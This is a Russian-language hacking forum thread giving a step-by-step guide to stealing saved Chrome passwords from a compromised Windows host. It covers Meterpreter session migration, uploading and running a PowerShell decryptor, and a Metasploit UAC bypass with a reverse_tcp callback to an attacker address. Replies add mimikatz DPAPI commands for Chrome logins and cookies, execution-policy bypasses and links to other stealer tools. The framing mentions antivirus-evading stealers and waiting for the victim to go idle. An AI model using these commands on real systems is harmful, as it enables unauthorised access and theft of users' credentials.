• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

O

OneDollar

Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа LaZagne убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При конвертировании питоновских файлов какие-то ошибки. Все бесит, нервы сдают, но выход есть всегда и сегодня - это изъятия пассов с помощью powershell скрипта.

Статья написана в дополнении к этой статье.
Инструмент предназначен для дампа паролей из ОС Windows, Browser Google Chrome

Атакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)

Источник: https://github.com/p0z/CPD

Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

upload_2017-11-29_3-25-56.png



2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

Код:
pgrep explorer
pid - ваш explorer
migrate pid

Создание каталога:

Код:
mkdir Pass
cd Pass

Загрузка файлов в созданный каталог (test):

Код:
upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll

PZLP0MxxRJU.jpg



upload_2017-11-29_3-50-11.png


3. Потереть ручки и выполнить следующую команду:

Код:
powershell -file Chrome_Passwords_Decryptor.ps1


Отлично, на выходе получаем вот это :
upload_2017-11-29_3-44-42.png


Prof1t!

P.S. Если не мигрировать, то пассов Вам не видать.

5WZQRyiSif0.jpg




Я бы даже выделил следующие преимущества:
  1. Просто в исполнении.
  2. Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
  3. Не требует закрытие процесса Хром в отличии от модуля в Empire.
P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч !
 

Вложения

  • upload_2017-11-29_3-40-15.png
    upload_2017-11-29_3-40-15.png
    40,2 КБ · Просмотры: 650
Последнее редактирование модератором:

woolf1514

Green Team
06.03.2017
181
191
BIT
1
Не сработало =( Windows server 2012 R2 Build 9600

upload_2017-11-29_12-4-54.png


И так далее. Может еще в какой процесс мигрировать?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Не сработало =( Windows server 2012 R2 Build 9600

Посмотреть вложение 13407

И так далее. Может еще в какой процесс мигрировать?
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
 
Последнее редактирование:

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Сессия админская. Скорее всего, проблема в том, что сессия от доменного админа, а не от локального...
Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.
17.jpg
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
от себя дополню)


https://github.com/pourquoibenoit/WinPirate грабит пассы от всего включая браузеры

https://github.com/Marten4n6/EvilOSX.git грабит пасы chrome от огрызков OSX

ну а вообще <mimikatz> умеет тоже делать такие вещи

Код:
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit

Автору, жму руку: "молодец что не сдаешься, выход есть всегда!)"
 

adm2

Green Team
05.07.2017
50
120
BIT
0
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j

А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)
 

woolf1514

Green Team
06.03.2017
181
191
BIT
1
Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.
Посмотреть вложение 13408

Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)
То доступ к домашней папке по идеи не должно запросить повышенный. В случае вульфа у него доступ ограничен к домашней папке админа и требует повышенных привилегий.
В случае необходимости угнать данные рядового юзера имея админскую сессию или от имени системы - то нужно смотреть в сторону token_impersonate и угонять сессионный токен рядового юзера я думаю.
[doublepost=1511950351,1511950029][/doublepost]
Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?
Ну у тебя по скрину видно что ексепшн из-за того что скрипт не может зайти в папку локального админа,так как дб файл паролей хрома хранится локально в домашней папки юзера.
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
миграция в процесс по любому нужна, так как она дает возможность действовать от любого процесса в системе и дает минимальный риск, то есть меньше палива)) говоря простым языком и это не единственное преимущество которое она дает)
 
  • Нравится
Реакции: Vertigo, OneDollar и IioS
O

OneDollar

Я только включаюсь в работу. Значит пока то что есть, могу показать какие у меня привилегии в системе где получилось взять пассы. В течении дня выложу результаты по 10. Спасибо всем!

upload_2017-11-29_15-13-32.png


upload_2017-11-29_15-13-44.png
 
  • Нравится
Реакции: id2746

swap3r

Green Team
06.11.2016
71
59
BIT
0
Возможно, вопрос немного не сюда, но тематика близкая. А есть ли что-то похожее для Chrome под Android?
Можно даже упростить задачу: наличие физического доступа к телефону, телефон не рутован (рутовать нельзя), нужно вытащить "забытый" пароль от форума, который сохраненный в браузере.
Спасибо.
 
  • Нравится
Реакции: TST
O

OneDollar

Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j

У меня данный способ не отрабатывает, на винде 10 открывается просмотр событий, сессия не создается.
Я воспользовался

exploit/windows/local/bypassuac_fodhelper

И сессия была создана. Привилегии есть такие же как и на windows server 2012 R2, но пишет ошибку. Ищу решение проблемы

upload_2017-11-29_16-29-25.png


upload_2017-11-29_16-56-6.png
 

Вложения

  • upload_2017-11-29_16-30-2.png
    upload_2017-11-29_16-30-2.png
    5,7 КБ · Просмотры: 197
Последнее редактирование модератором:
T

TST

Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа LaZagne убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При конвертировании питоновских файлов какие-то ошибки. Все бесит, нервы сдают, но выход есть всегда и сегодня - это изъятия пассов с помощью powershell скрипта.

Статья написана в дополнении к этой статье.
Инструмент предназначен для дампа паролей из ОС Windows, Browser Google Chrome

Атакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)

Источник: https://github.com/p0z/CPD

Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

Посмотреть вложение 13384


2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

Код:
pgrep explorer
pid - ваш explorer
migrate pid

Создание каталога:

Код:
mkdir Pass
cd Pass

Загрузка файлов в созданный каталог (test):

Код:
upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll

PZLP0MxxRJU.jpg



Посмотреть вложение 13388

3. Потереть ручки и выполнить следующую команду:

Код:
powershell -file Chrome_Passwords_Decryptor.ps1


Отлично, на выходе получаем вот это :
Посмотреть вложение 13387

Prof1t!

P.S. Если не мигрировать, то пассов Вам не видать.

5WZQRyiSif0.jpg




Я бы даже выделил следующие преимущества:

  1. Просто в исполнении.
    Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
    Не требует закрытие процесса Хром в отличии от модуля в Empire.
P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч !

При загрузке выдает ошибку что
core_channel_open: Operation failed: The system cannot find the path specified.
Screenshot from 2017-11-30 10-33-11.png
 
O

OneDollar

У меня данный способ не отрабатывает, на винде 10 открывается просмотр событий, сессия не создается.
Я воспользовался

exploit/windows/local/bypassuac_fodhelper

И сессия была создана. Привилегии есть такие же как и на windows server 2012 R2, но пишет ошибку. Ищу решение проблемы

Посмотреть вложение 13423

Посмотреть вложение 13425

Решил допилить темку. Значится так, если мы видим сообщения как здесь на скрине, то все что нам нужно сделать это :

Код:
powershell Set-ExecutionPolicy BYPASS

Подробнее что мы делаем данной командой в шеле и

Важно, привилегии при этом должны быть именно администратора. Как писал в коментах ~~DarkNode~~ " как будто вы на целевой машине запускается что-либо от имени админа" так и тут ! Метод получения прав админа я описал в своей следующей статье связанной с дампом информации из буфера обмена, там то и описаны способы повышения привилегий до админ. Чекайте тут

Важно: вы должны находится в процессе с х64 иначе скрипт так же не отработает, в подробностях не могу сказать почему, позабыл где читал, но у меня так же не отрабатывал будь я в любом процессе х86!

Есть процесс повершел х86 и х64. Нам нужно разрешить запуск скрипта для двух этих шеллов. Для этого

Код:
x64 shell C:\Windows\syswow64\Windowspowershell\v1.0\powershell Set-ExecutionPolicy BYPASS[/B][/B][/B]
[B][B][B]x32 shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell Set-ExecutionPolicy BYPASS

upload_2017-12-3_20-47-2.png


upload_2017-12-3_20-41-34.png

Если мы в метерпретере, то так же нужно проверить разрядность командной строки или повершел

Код:
В CMD: echo %PROCESSOR_ARCHITECTURE%
В Powershell: powershell [Environment]::Is64BitProcess

Мы должны видеть это :

upload_2017-12-3_20-25-47.png

upload_2017-12-3_20-26-27.png

Если соблюдены все правила :

1. мы от админа
2. мы разрешили запуск скриптов ps1 без их проверки как для х64 так и для х86 powershell
3. мы находимся в х64 процессе
4. мы полили клавиатуру святой водой

То на выходе получим это :

-qpHD6UKo74.jpg


PROF1T!
В заключении хочу сказать, что все легко и просто бывает только в сказках. В любом случае каждая система требует индивидуальных извращений. С одной из таких и я столкнулся. Так же виндовс 10, так же процесс х64. Так же права админа, также разрешен запуск скриптов без разрешения, но подвел именно декрипт! Мне выбило пассы в левом столбце, а логины и адреса сайтов в дикую перемешку справа! Я так и не смог с помощью данного способа получить адекватно пассы. Но сдаваться когда есть цель нельзя! Я не просто так говорю, потому что я пошел далее, дождался пока агент будет АФК, убил процессы хрома (это одно из главных правил при получении паролей в империи) и будучи при админ правах запустил дамп пассов с хрома и получил их!! Действуйте, не сдавайтесь, ищите новые лазейки, проявляйте творчество в этом не легком деле и даже после 100 поражений и будет вам результат!
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!